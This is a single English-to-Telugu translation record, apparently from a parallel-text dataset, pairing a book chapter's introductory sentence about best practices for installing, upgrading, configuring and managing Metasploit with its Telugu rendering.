{"en":"In this chapter, you will learn some of the best practices for installing, upgrading, configuring, and managing Metasploit and the machine on which it is installed.","translation":"ఈ అధ్యాయంలో, మీరు Metasploit మరియు అది ఇన్‌స్టాల్ చేయబడిన యంత్రాన్ని ఇన్‌స్టాల్ చేయడం, అప్‌గ్రేడ్ చేయడం, కాన్ఫిగర్ చేయడం మరియు నిర్వహించడం కోసం కొన్ని ఉత్తమ పద్ధతులను నేర్చుకుంటారు.","target_lang":"te","domain":"technical","complexity":"moderate"}